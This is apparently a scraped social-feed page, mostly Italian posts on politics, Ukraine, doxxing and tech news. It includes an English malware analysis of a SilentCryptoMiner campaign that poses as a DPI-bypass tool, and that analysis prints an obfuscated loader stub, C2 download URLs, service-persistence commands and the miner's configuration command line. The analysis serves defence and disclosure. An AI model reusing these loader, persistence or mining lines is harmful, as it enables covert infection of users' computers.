Strategia Zero Trust, proviamo a capire meglio di cosa si tratta
@Informatica (Italy e non Italy 😁)
Una guida di Cloud Security Alliance (CSA) ci aiuta a comprendere in cosa consista la strategia ZT e come la sua adozione possa contribuire a favorire la trasformazione digitale delle organizzazioni, oltre ad aumentarne la sicurezza e la resilienza
L'articolo Strategia Zero
Informatica (Italy e non Italy 😁) reshared this.
Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool
In recent months, we’ve seen an increase in the use of Windows Packet Divert drivers to intercept and modify network traffic in Windows systems. This technology is used in various utilities, including ones for bypassing blocks and restrictions of access to resources worldwide. Over the past six months, our systems have logged more than 2.4 million detections of such drivers on user devices.
Dynamics of Windows Packet Divert detections (download)
The growing popularity of tools using Windows Packet Divert has attracted cybercriminals. They started distributing malware under the guise of restriction bypass programs and injecting malicious code into existing programs.
Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives. This plays into the hands of attackers by allowing them to persist in an unprotected system without the risk of detection. Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency. The most commonly used malware families were NJRat, XWorm, Phemedrone and DCRat.
Blackmail as a new infection scheme
We recently uncovered a mass malware campaign infecting users with a miner disguised as a tool for bypassing blocks based on deep packet inspection (DPI). The original version of the tool is published on GitHub, where it has been starred more than 10,000 times. There is also a separate project based on it that is used to access Discord and YouTube.
According to our telemetry, the malware campaign has affected more than 2,000 victims in Russia, but the overall figure could be much higher. One of the infection channels was a YouTuber with 60,000 subscribers, who posted several videos with instructions for bypassing blocks, adding a link to a malicious archive in the description. These videos have reached more than 400,000 views. The description was later edited and the link replaced with the message “program does not work”.
The link pointed to the malicious site
gitrok[.]com, which hosted the infected archive. The counter at the time of posting the video showed more than 40,000 downloads.
Later, in discussions in the tool’s original repository, we found messages about a new distribution scheme: attackers under the guise of the tool developers sent strikes about the videos with instructions for bypassing restrictions. Next, the attackers threatened the content creators under the pretext of copyright infringement, demanding that they post videos with malicious links or risk shutdown of their YouTube channels.
Translation:
Hi, I have a question about YouTube strikes on the use of open-source code from the repository [REDACTED].
I created a tutorial video using materials from this repository, since it was publicly available on GitHub, and the video was non-commercial. But I still got hit with a YouTube strike for demonstrating the code.
I’d like to know if it’s the authors themselves or someone on their behalf who send the strikes? Or is it just a misunderstanding?
This way, the scammers were able to manipulate the reputation of popular YouTubers to force them to post links to infected files.
Example of a fraudulent message asking a YouTuber to post a link to a malicious site
Translation:
Official website: gitrok.com
All traffic should be now directed strictly to this site. GitHub remains solely a repository for developers.
If you have social networks where you’ve advertised [REDACTED], please publish a new post with a mention of our official website, and note that you can now download [REDACTED] only from there.
YouTuber complaints about cybercriminal activity
Translation:
Dear program developer @[REDACTED] YouTubers who showed how the program works and helped people unblock YouTube in Russia are having problems with scammers handing out strikes and threatening to delete these creators’ channels. They force you to shoot 2 more videos for your channel so that if anything happens they can send 2 more strikes, then it’s 3 strikes and you’re out – Google will delete the channel. YouTubers feel pressured to give in to the scammers’ demands to save their channels. But that only makes things worse.
SCAMMERS FORCE YOUTUBERS TO SHOOT VIDEOS OF THEIR PROGRAM, THAT’S WHY I DON’T HAVE A SINGLE YOUTUBE VIDEO OF THIS PROGRAM…
In addition, we found a Telegram channel actively distributing the malicious build and a video tutorial on a YouTube channel with 340,000 subscribers.
And in December 2024, users reported the distribution of a miner-infected version of the same tool through other Telegram and YouTube channels, which have since been shut down.
Infected archive
All the discovered infected archives contained one additional executable file, while the original start script
general.bat had been modified to run this file using PowerShell. In one version, if the security solution on the victim’s device deleted the malicious file, the modified start script displayed the message “File not found, disable all antiviruses and re-download the file, that will help!” to persuade the victim to run the malicious file, bypassing protection:
Contents of the original (left) and modified (right) general.bat start script
The malicious executable is a simple loader written in Python and packed into an executable application using PyInstaller. In some cases, the script has been additionally obfuscated using the PyArmor library.
import os
import subprocess
import sys
import ctypes
import base64
import tempfile
import urllib.request as urllib
import datetime
import time
import psutil
import base64
import binascii
cmb8F2SLqf1 = '595663786432497a536a424...335331453950513d3d'
decoded_hex = bytes.fromhex(cmb8F2SLqf1).decode()
step1 = base64.b64decode(decoded_hex).decode()
exec(base64.b64decode(step1).decode())
Example of the unpacked loader
The loader retrieves the URL of the next-stage payload from a hardcoded path on one of two domains:
canvas[.]pet or swapme[.]fun. After the download, it saves the payload named t.py in a temporary directory and runs it.
Note that the payload can be downloaded only from Russian IP addresses, indicating that the malware campaign was aimed at users in Russia.
Second-stage malware loader
The next stage of the infection chain was a custom Python loader based on open-source code snippets. Below are the execution steps for this script:
- Scanning the current environment for artifacts of running on a virtual machine or in a sandbox. The loader compares system data (computer and user names, MAC addresses, unique disk identifiers (HWID), GPU parameters, etc.) with predefined lists of values used by virtual environments.
- Adding the AppData directory to Microsoft Defender exclusions.
- GET request to 193.233.203[.]138/WjEjoHCj/t. Depending on the response (true/false) and the specified probability, the script either downloads the executable file from the server at http://9x9o[.]com/q.txt, or uses a hardcoded block of data in Base64 format. The resulting file is saved at %LocalAppData%\driverpatch9t1ohxw8\di.exe.
- Modifying the payload. The executable file just written to disk is modified by appending random blocks of data to the end until it reaches 690 MB in size. This technique is used to hinder automatic analysis by antivirus solutions and sandboxes.
- Gaining persistence in the system. The loader creates a service named DrvSvc and sets its description to that of the legitimate Windows Image Acquisition (WIA) service:
svc_name = "DrvSvc"
svc_desc = "Launches applications associated with still image acquisition events."
cmd_create = f'sc create {svc_name} binPath= "{exe_path}" start= auto'
cmd_desc = f'sc description {svc_name} "{svc_desc}"'
SilentCryptoMiner
The downloaded
di.exe is a SilentCryptoMiner sample based on the open-source miner XMRig. This is a covert miner able to mine multiple cryptocurrencies (ETH, ETC, XMR, RTM and others) using various algorithms. For stealth, SilentCryptoMiner employs process hollowing to inject the miner code into a system process (in this case, dwm.exe). The malware is able to stop mining while the processes specified in the configuration are active. It can be controlled remotely via a web panel. The miner is coded to scan for indicators of running in a virtual environment and check the size of the executable itself, which must be at least 680 MB and no more than 800 MB – this is how the attackers make sure that the miner was run by the above-described loader.
The miner configuration is Base64-encoded and encrypted using the AES-CBC algorithm with the key
UXUUXUUXUUCommandULineUUXUUXUUXU and the initialization vector UUCommandULineUU. It has many parameters, including: the algorithm and URL for mining; a list of programs which upon execution cause the miner to temporarily stop and free its resources; a link to the remote configuration that the miner will receive every 100 minutes.--algo=rx/0 --url=150.241.93[.]90:443 --user="JAN2024" --pass="JAN2024" --cpu-
max-threads-hint=20 --cinit-remote-config="https://pastebin.com/raw/kDDLXFac" --
cinit-stealth-
targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --
cinit-version="3.2.0" --tls --cinit-idle-wait=4 --cinit-idle-cpu=30 --cinit-
id="uvduaauhlrqdhmpj"
The campaign makes use of the Pastebin service to store configuration files. We detected several accounts distributing such files.
Takeaways
The topic of restriction bypass tools is being actively exploited to distribute malware. The above campaign limited itself to distributing a miner, but threat actors could start to use this vector for more complex attacks, including data theft and downloading other malware. This underscores once again that, while such tools may look enticing, they pose a serious threat to user data security.
Indicators of compromise
Infected archives
574ed9859fcdcc060e912cb2a8d1142c
91b7cfd1f9f08c24e17d730233b80d5f
PyInstaller loaders
9808b8430667f896bcc0cb132057a683
0c380d648c0c4b65ff66269e331a0f00
Malicious Python scripts
1f52ec40d3120014bb9c6858e3ba907f
a14794984c8f8ab03b21890ecd7b89cb
SilentCryptoMiner
a2a9eeb3113a3e6958836e8226a8f78f
5c5c617b53f388176173768ae19952e8
ac5cb1c0be04e68c7aee9a4348b37195
Malicious domains and IPs
hxxp://gitrok[.]com
hxxp://swapme[.]fun
hxxp://canvas[.]pet
hxxp://9x9o[.]com
193.233.203[.]138
150.241.93[.]90
Difendere la bellezza
La bellezza del cielo stellato è una cosa da ammirare, e da difendere. Ogni perdita di meraviglia è infatti un drammatico impoverimento, e qui la meraviglia in gioco è davvero molta…Stardust
Estiqaatzi reshared this.
Cybersec2025, Butti: ‘AI, geopolitica e sicurezza le priorità del prossimo decennio’
@Informatica (Italy e non Italy 😁)
“Intelligenza artificiale, geopolitica e cybersicurezza con particolare attenzione al quantum computing sono i tre temi che segneranno il prossimo decennio”. Lo ha detto Alessio Butti, Sottosegretario di Stato alla Presidenza del Consiglio dei
Informatica (Italy e non Italy 😁) reshared this.
CyberSEC2025, Beccia (NATO): ‘AI, Cybersecurity e geopolitica il nuovo campo di battaglia dell’era digitale’
@Informatica (Italy e non Italy 😁)
“La cybersecurity è un lavoro di squadra. Si tratta di un ambito ampiamente asimmetrico dal punto di vista degli sforzi per assicurarla e dei rischi. E’ in ballo una forte complessità sul fronte delle
Informatica (Italy e non Italy 😁) reshared this.
FDP, lezione tedesca per i liberali italiani
@Politica interna, europea e internazionale
L'articolo FDP, lezione tedesca per i liberali italiani proviene da Fondazione Luigi Einaudi.
Politica interna, europea e internazionale reshared this.
La gomma arabica di Coca-Cola e M&M’s è contrabbandata nel Sudan in guerra
@Notizie dall'Italia e dal mondo
Il Sudan è il principale produttore mondiale di gomma arabica e fornisce l'80% della produzione globale. La sostanza è fondamentale per stabilizzare e addensare ingredienti in una vasta gamma di prodotti, dai rossetti di L'Oréal agli alimenti per animali
Notizie dall'Italia e dal mondo reshared this.
Doxxing nel Dark Web: La Vendetta che Nessuno Può Evitare
Nel Dark Web, l’anonimato è la valuta più preziosa. È ciò che distingue i predatori dalle prede, che consente ai cyber criminali di operare senza paura di conseguenze, che alimenta la convinzione di essere intoccabili. Ma cosa succede quando qualcosa si spezza? Quando coloro che costruiscono il proprio potere sulla paura di essere esposti diventano, a loro volta, vittime dello stesso meccanismo?
Negli ultimi anni, alcuni dei più noti protagonisti del cybercrime hanno vissuto sulla propria pelle il paradosso del doxxing: credendo di poter agire impunemente, sono stati smascherati e costretti alla fuga, a volte dalla legge, altre volte dagli stessi ambienti che un tempo li osannavano. Perché nel Dark Web, l’anonimato è solo un’illusione.
Nel mondo del doxxing, nessuna piattaforma era più temuta di Doxbin, un forum del Dark Web dove venivano pubblicate informazioni personali di individui presi di mira dalla community: giornalisti, forze dell’ordine, rivali. A gestirlo c’era KT, un personaggio enigmatico che, per anni, ha cavalcato la paura e il caos che il sito generava.
Ma nel 2022, l’equilibrio si è spezzato. Dopo aver venduto Doxbin, KT ha scoperto che il passato non si cancella facilmente nel Dark Web. In breve tempo, il nuovo amministratore ha divulgato la sua identità, esponendolo a ritorsioni, minacce e alla stessa identica dinamica che lui stesso aveva alimentato.
Nel Dark Web, il potere è effimero. Basta un solo errore, un singolo tradimento, e ciò che sembrava una fortezza diventa una prigione senza vie di fuga.
RaidForums e la Fine di Omnipotent: Il Dark Web Non Perdona
Se Doxbin rappresentava il lato più brutale del doxxing, RaidForums rappresenta il regno della compravendita di dati rubati. Qui vengono scambiati credenziali, numeri di carte di credito, informazioni sottratte a enti governativi e aziende di tutto il mondo. A regnare su questo impero c’era Omnipotent, un nome che trasmetteva onnipotenza e intoccabilità.
Eppure, nel 2022, un’operazione internazionale ha messo fine a questa illusione. Come è stato smascherato? È stata un’infiltrazione delle forze dell’ordine? Una fuga di dati interna? O forse, semplicemente, l’arroganza di sentirsi al sicuro?
Ciò che è certo è che Omnipotent è caduto. Il suo anonimato, su cui aveva costruito tutto, si è rivelato fragile. E quando l’anonimato svanisce, l’unica cosa che resta è la paura di essere trovato.
Ma il doxxing non arriva solo dall’esterno. A volte, il pericolo è dentro le stesse organizzazioni.
Il Tradimento che ha Distrutto Conti: Quando il Cybercrime si Sbriciola dall’Interno
Il gruppo ransomware Conti ha terrorizzato aziende e governi, accumulando milioni di dollari in riscatti. La loro rete era complessa, ben strutturata, apparentemente inespugnabile. Tuttavia, nel 2022, un evento inaspettato ha mandato tutto in frantumi: un insider ha deciso di pubblicare l’intero archivio delle loro conversazioni interne, rivelando strategie, affiliazioni e identità dei membri.
Non è stata la polizia, né un’operazione di intelligence. È stato un tradimento interno, il prodotto di tensioni, dissapori o forse della consapevolezza che il sistema era destinato a crollare.
Questa fuga di informazioni ha segnato la fine di Conti. Molti affiliati si sono dati alla fuga, alcuni sono stati arrestati, altri hanno tentato di reinventarsi sotto nuove identità. Ma la lezione era chiara: nel cybercrime, il nemico più letale può essere quello che siede accanto a te.
Nel Dark Web, la fiducia è un’arma a doppio taglio. Oggi sei un alleato, domani potresti essere il prossimo bersaglio.
Il doxxing è una lama senza manico. Chi lo impugna deve essere pronto a tagliarsi.
L'articolo Doxxing nel Dark Web: La Vendetta che Nessuno Può Evitare proviene da il blog della sicurezza informatica.
Un libro importantissimo su un tema ancora sottovalutato.
Buongiorno a tutti!
Voglio suggerirvi un libro che a mio avviso è importantissimo, e lo dico anche da persona che lavora nell'informatica da trent'anni e usa computer da 44, da quando internet ancora non era diffuso.
Ci troviamo di fronte a quello che a mio avviso è un capolavoro per fare capire come il Cremlino manovri l'informazione - e soprattutto la cattiva informazione - con lo scopo di destabilizzare l'Europa.
Ora i più pruriginosi di voi mi diranno che anche gli Stati Uniti lo fanno, ma è proprio leggendo il testo che si comprende come il modo sia del tutto diverso: nel caso della Russia, l'obiettivo non è creare simpatia nei loro confronti (cosa difficile, del resto, per qualsiasi umano con 2 neuroni in fila), ma creare disordine.
Nel disordine, nel caos che non ti fa più capire cosa è vero e cosa è falso, è facilissimo cedere a sovranismi, secessioni, porcate varie.
E il loro scopo è già stato raggiunto.
A questo si sommano ovviamente gli attacchi informatici...ma è tutto nel libro.
Buona lettura e, se lo leggerete, fatemi sapere cosa ne pensate.
ledizioni.it/prodotto/brigate-…
BRIGATE RUSSE -
Ledizioni - Innovative Publishing. Casa editrice universitaria. Open Access. eBook, ePub. Creative Commons.Ledizioni
CarlitoJones likes this.
Simon Perry reshared this.
BRASILE. Il processo a Bolsonaro per il golpe cambia le carte in tavola
@Notizie dall'Italia e dal mondo
La possibile condanna dell'ex presidente, accusato dalla Procura Generale assieme ad altre 33 persone di aver cercato di avvelenare Lula, è un fatto nuovo nel Paese. Abbiamo intervistato il sociologo Carlos Eduardo Martins, professore all'Università di San
Notizie dall'Italia e dal mondo reshared this.
Mettersi nei panni degli altri, a volte, aiuta.
Mi chiedo cosa ci sia di difficile da capire.
Eppure, a quanto pare c'è ancora chi è convinto che la pace si ottenga con la resa.
Il che, almeno temporaneamente, sarebbe anche vero ma senza dimenticare che pace non è uguale a giustizia.
Forse questo articolo può fare comprendere un concetto tanto semplice quanto ignorato.
esquire.com/it/news/attualita/…
Come sarebbe l'Italia se perdesse il 20% del suo territorio, tipo l'Ucraina
Perderebbe Piemonte, Liguria e Lombardia. Da San Remo fino a Ferrara.Enrico Pitzianti (Esquire)
freezonemagazine.com/rubriche/…
Il bar italiano è una terra di nessuno e di tutti, a metà tra il tempo libero e l’attività professionale: lo diceva sempre Umberto Eco. Forse non è l‘esatta frase ma non è possibile che non abbia detto nulla anche sui bar il tuttologo Eco. Comunque ogni pensiero di Eco è certamente una osservazione intelligente. […]
L'articolo Barbera e champagne proviene da FREE ZONE MAGAZINE.
Il bar italiano è una terra di
Da un piccolo paese a una città metropolitana
@Politica interna, europea e internazionale
Lunedì 10 marzo 2025, ore 18:00 presso la Fondazione Luigi Einaudi, Roma Interverranno GABRIELE ALBERTINI, già sindaco di Milano DAVIDE FERRARI, amministratore pagina “Se sei Sindaco” MATTEO GROSSI, Coordinatore Consulta Enti Locali FLE ROBERTO MANTOVANI alias ROBERTO RED SOX, Tassista Modera Massimiliano Lenzi, La
Politica interna, europea e internazionale reshared this.
Conte: 'Da von der Leyen furia bellicista'. Il M5s non va in piazza il 15 marzo, 'no all'Ue del riamo' - Notizie - Ansa.it
Nelle parole di von der Leyen c'è "una furia bellicista che noi contrasteremo in ogni modo. Il blu dell'Europa si tinge di verde militare". Lo ha detto il presidente del M5s, Giuseppe Conte. "Il blu dell'Europa si tinge di verde militare". (ANSA)Agenzia ANSA
like this
L’incertezza domina il Mediterraneo allargato. Così l’Italia protegge la sicurezza nazionale - Formiche.net
Dalla crisi a Gaza, alle relazioni Riad-Teheran, dalle tensioni nel Corno d’Africa alla Libia. L’intelligence italiana fotografaEmanuele Rossi (Formiche.net)
Giuseppe Conte: “Il M5s non andrà in piazza il 15 marzo: no all’Ue del riarmo”
@Politica interna, europea e internazionale
“Il blu dell’Europa si tinge di verde militare, no alla follia di 800 miliardi in armi!”. Così l’ex premier e leader del Movimento 5 stelle, Giuseppe Conte, risponde al piano annunciato oggi dalla presidente della Commissione europea, Ursula von der Leyen, “per
Politica interna, europea e internazionale reshared this.
Le armi e gli aiuti statunitensi che mancheranno di più all’Ucraina
Dopo la decisione di Trump di sospenderli: sono sistemi di difesa aerea, munizioni per i lanciarazzi mobili e forse la condivisione di intelligence, tra le altre coseIl Post
#Trump e #Ucraina, l'Europa nel caos
Trump e Ucraina, l'Europa nel caos
La svolta drastica impressa dalla nuova amministrazione americana alla crisi ucraina continua a generare gravi tensioni nei rapporti transatlantici, con la Casa Bianca sempre più decisa a ridisegnare gli equilibri geo-politici degli ultimi decenni e …www.altrenotizie.org
Verso il Consiglio europeo, quanto costerà all’Ue difendersi senza gli Usa
@Notizie dall'Italia e dal mondo
Premessa: gli Usa sono un alleato dell’Ue, specifica il portavoce della Commissione europea prima del consiglio europeo. Sostanza: serve mobilitare livelli significativi di risorse per assistere “i nostri amici ucraini”, ovvero lo schema seguito da ReArm Europe. Nel mezzo
Notizie dall'Italia e dal mondo reshared this.
Elly Schlein boccia il piano di riarmo di von der Leyen: “Non è la strada giusta per l’Ue”
@Politica interna, europea e internazionale
Elly Schlein boccia il piano di riarmo da 800 miliardi di euro annunciato oggi dalla presidente della Commissione europea Ursula von der Leyen. “Non è la strada che serve all’Europa”, attacca la segretaria del Pd: “All’Unione europea – osserva – serve la difesa
Politica interna, europea e internazionale reshared this.
Lollobrigida contro il caro-ostriche, "abbassare l'Iva"
Le priorità, quelle vere...
Il ministro dell'Agricoltura suggerisce una riduzione dell'imposta dal 22 al 10%. Il Pd, "il governo fuori dalla realtà"
L'Information Commissioner's Office (ICO) del Regno Unito ha avviato un'indagine sulle piattaforme online TikTok, Reddit e Imgur per valutare le misure adottate per proteggere i bambini di età compresa tra 13 e 17 anni nel Paese.
L'organismo di controllo ha affermato che sta indagando sul modo in cui il servizio di condivisione video di proprietà di ByteDance utilizza i dati personali dei bambini in questa fascia di età per far emergere raccomandazioni e fornire contenuti suggeriti nei loro feed.
L'ICO ha dichiarato che sta esaminando se i servizi abbiano violato le leggi sulla protezione dei dati e che condividerà le prove scoperte, se presenti, con le aziende per ottenere le loro "rappresentanze" prima di giungere a una conclusione definitiva. John Edwards, Commissario per l'informazione del Regno Unito, ha affermato che:
"La responsabilità di garantire la sicurezza dei bambini online ricade fermamente sulle aziende che offrono questi servizi e il mio ufficio è fermo nel suo impegno a chieder loro conto"
thehackernews.com/2025/03/uk-i…
U.K. ICO Investigates TikTok, Reddit, and Imgur Over Children's Data Protection Practices
U.K. ICO launches investigations into TikTok, Reddit, and Imgur over concerns about children's data privacy and online safety complianceThe Hacker News
reshared this
Il mammuth "partorisce" il topolino, ma stavolta è una cosa davvero figa: nel tentativo di far rivivere il mammut lanoso, la Colossal Biosciences ha creato un topo lanoso
Colossal Biosciences, nota per il suo obiettivo stravagante di resuscitare il mammut lanoso entro il 2028, afferma di aver fatto progressi costanti. La sua prova: topi geneticamente modificati per avere una pelliccia simile a quella del mammut.
Per progettare il topo lanoso, gli scienziati dell'azienda hanno trovato versioni di topi di geni di mammut e poi hanno utilizzato CRISPR per modificare gli embrioni di topi, ha detto a TechCrunch la dott. ssa Beth Shapiro, responsabile scientifico di Colossal. Quindi, quegli embrioni sono stati impiantati in madri topo surrogate.
L'azienda afferma che il colore, la consistenza e lo spessore della pelliccia dei topi lanosi ricordano i tratti del mammut.
techcrunch.com/2025/03/04/on-a…
On a quest to revive the woolly mammoth, Colossal Biosciences has created a woolly mouse | TechCrunch
Colossal Biosciences, known for its outlandish goal to resurrect the woolly mammoth by 2028, is claiming steady progress. Its evidence: GeneticallyMarina Temkin (TechCrunch)
reshared this
like this
Qatargate, chiesta la revoca dell’immunità per le due eurodeputate del Pd Moretti e Gualmini
@Politica interna, europea e internazionale
La Procura federale del Belgio ha chiesto al Parlamento europeo la revoca dell’immunità parlamentare per due eurodeputate italiane del gruppo del Partito Socialista europeo nell’ambito dell’indagine sul cosiddetto Qatargate. Secondo quanto
Politica interna, europea e internazionale reshared this.
L’ultima proposta del ministro Lollobrigida: “Ridurre l’Iva sulle ostriche: non sono beni di lusso”
@Politica interna, europea e internazionale
“Abbassare l’Iva sulle ostriche”. L’ultima proposta del ministro dell’Agricoltura Francesco Lollobrigida, arrivata durante una degustazione di ostriche promossa al Senato dal compagno di partito di Fratelli d’Italia, Alberto Balboni, mira a “mettere più
Politica interna, europea e internazionale reshared this.
Timothy Garton Ash – Patrie
@Politica interna, europea e internazionale
L'articolo Timothy Garton Ash – Patrie proviene da Fondazione Luigi Einaudi.
Politica interna, europea e internazionale reshared this.
La redazione di RaiNews24 sfiducia il direttore Paolo Petrecca con l’83% dei voti: “Gestione disastrosa”
@Politica interna, europea e internazionale
La redazione di RaiNews24 ha sfiduciato il direttore Paolo Petrecca, in carica da novembre 2021. Hanno votato a favore della sfiducia l’83% dei giornalisti. Su 211 aventi diritto, hanno partecipato alla consultazione 159 membri della redazione: di
Politica interna, europea e internazionale reshared this.
La mascolinità tossica che peggiora le patologie delle donne.
Amici e soprattutto amiche, qui il risultato di alcune riflessioni su come la mascolinità tossica possa complicare o aggravare la condizione delle donne che soffrono di artrite, fibromialgia, o qualsiasi altra patologia grave ed invisibile.
Ciao Simone, ho letto il blog come di consueto e ne condivido il contenuto, la discriminante femminile è senza dubbio presente su un ben più ampio spettro di aspetti della vita. Mi fa pensare quando scrivi "tanto non serve a nulla" e dissento. Anche il più piccolo spunto e anche solo un contatto raggiunto e sensibilizzato, sono un passo avanti. Ti sembrerà poco ma io sono ottimista e vedo il bicchiere mezzo pieno. Sempre grazie per i tuoi sforzi ❤️
Simon Perry likes this.
@Emanuele @GRIDO muto (podcast)
Grazie a te, è importante sapere ciò che mi dici 🫂
Ormai siamo al gran finale!
Alternativa a Google Drive cercasi
Vorrei installare sul mio sito qualcosa che mi permetta di sganciarmi da Google Drive.
In pratica mi serve qualcosa dove tenere le ricevute del bollo auto, referti di visite mediche, polizza dell'assicurazione... tutte quelle cose che una volta erano su carta e tenevamo a casa in un faldone.
Mi serve che sia open source, che l'accesso sia regolato da password, che sia sicuro (non devo tenerci niente di vitale ma mi scoccerebbe comunque vedere qualcuno che fa volantinaggio con le mie analisi del sangue), che si possano creare directory e un "plus" sarebbe la possibilità di fare editing almeno di file di testo.
Ne ho visti diversi ma sono tutti applicazioni che richiedono l'accesso ad un server, io cerco qualcosa di simile a un CMS (WordPress, Mediawiki, phpBB, ecc.).
Suggerimenti?
@magia
Scusa non avevo ricevuto la notifica per la tua risposta, l'ho vista solo ora.
Manco a farlo apposta alla fine ho installato proprio NextCloud 😁
Ma Gianluca likes this.
@max
github.com/awesome-selfhosted/…
Se esiste probabilmente è indicata in questa repo di github!!
Se ho capito bene ti serve un "drive" che puoi raggiungere comodamente dal tuo sito, giusto? Vuoi un'interfaccia grafica simile.
Non so però se è una buona idea poterlo raggiungere da un sito web pubblico
@carjon
Perché dici di no? Ho installato NextCloud e ho attivato la two factor authentication via authenticator.
Ma quindi per la manifestazione pro-Europa di Serra del 15 marzo che si fa?
Difesa europea, senza un comando unificato non si va da nessuna parte. L’analisi di Giancotti
@Notizie dall'Italia e dal mondo
In questo mese di febbraio molto è accaduto. Donald Trump, JD Vance e Pete Hegseth hanno operato una rottura senza precedenti degli Usa con l’Europa e l’Ucraina, culminata con la furiosa cacciata di Volodymyr Zelensky dalla Casa Bianca.
Notizie dall'Italia e dal mondo reshared this.
La cornice delle missioni alleate nel sud-est della Francia grupposbarchi.wordpress.com/20…
rag. Gustavino Bevilacqua reshared this.
Incendio delle Tesla: per favore, non chiamiamole proteste.
Oggi vedo parecchie mutande bagnate per l'incendio delle Tesla in Francia, ma ricordatevi che questo è, semplicemente, terrorismo (o vandalismo nella migliore delle ipotesi).
Affermare qualcosa di diverso è rendersi complici di una logica deviata, quella dell'occhio per occhio, degli estremismi seplificatori sulla realtà del mondo.
Ecco, l'ho detto.
@Greg_89 mea culpa, non c'è nessun articolo ma Mastodon e Friendica (da cui scrivo) non vanno troppo d'accordo.
Quello che tu vedi come link è il collegamento al mio post su Friendica, non so bene perché poi non si riesca ad aprire. Devo studiare ancora un po' come funziona. 🙁
Ministero dell'Istruzione
Sul sito del #MIM è disponibile la sezione dedicata alla mobilità del personale docente, educativo e ATA per l’anno scolastico 2025/2026.Telegram
PODCAST. La Cina non vuole scottarsi con l’Ucraina
@Notizie dall'Italia e dal mondo
Donald Trump cerca di staccare Mosca dalla Cina. L'equilibrismo di Pechino tra Russia, Usa e Unione Europea
L'articolo PODCAST. La Cina non vuole scottarsi con l’Ucraina proviene da Pagine Esteri.
Notizie dall'Italia e dal mondo reshared this.
freezonemagazine.com/news/dani…
In libreria dal 7 marzo 2025 «Se mai un giorno scrivessi un’autobiografia dovrebbe intitolarsi Troppo. Troppo povera, troppo malata, troppo grassa o troppo debole. Per tutta la vita c’è sempre stato qualcosa di me che era troppo poco. Oppure TROPPO». Germania, anni Ottanta. Ela ha sei anni e «come una piccola investigatrice privata» osserva la […]
L'articolo Daniela Dröscher – Bugie
Fino a che punto il Ruanda si spingerà in Congo?
@Notizie dall'Italia e dal mondo
Complice l'inerzia dell'Occidente, Kigali sta facendo a pezzi il suo vicino e riaccende una guerra regionale
L'articolo Fino a che punto il Ruanda si spingerà in Congo? proviene da Pagine Esteri.
Notizie dall'Italia e dal mondo reshared this.
Giovanni
in reply to Elezioni e Politica 2025 • • •Politica interna, europea e internazionale reshared this.
Elezioni e Politica 2025
in reply to Giovanni • •Politica interna, europea e internazionale reshared this.
Giovanni
in reply to Elezioni e Politica 2025 • • •